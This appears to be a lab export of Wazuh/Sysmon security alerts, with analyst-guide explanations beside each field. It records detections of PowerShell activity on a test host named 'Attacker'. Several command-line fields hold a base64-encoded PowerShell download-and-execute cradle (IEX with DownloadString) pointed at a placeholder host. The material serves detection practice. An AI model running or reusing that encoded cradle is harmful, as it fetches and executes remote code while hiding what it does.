data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12264 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1073340 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:04.6354631Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282462 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:04.632
ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00}
ProcessId: 11368
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zrwibxxr.3hb.ps1
CreationUtcTime: 2025-04-24 22:36:04.632
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:04.632 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd3-680a-c80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zrwibxxr.3hb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:04.632 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1076109 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:06.3023920Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282529 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:05.384
ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00}
ProcessId: 11096
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00}
ParentProcessId: 11368
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:05.384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1084180 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:06.5107228Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282532 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:06.494
ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00}
ProcessId: 11096
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4b14azk2.mml.ps1
CreationUtcTime: 2025-04-24 22:36:06.494
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:06.494 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4b14azk2.mml.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:06.494 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534219.1086949 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:07.3943395Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2403 Incremental log record number – handy for timeline order.
data.win.system.processID: 14228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:07Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534219.1088531 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:08.7114133Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282582 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:07.440
ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00}
ProcessId: 652
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00}
ParentProcessId: 11096
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:07.440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd7-680a-d00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 652 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
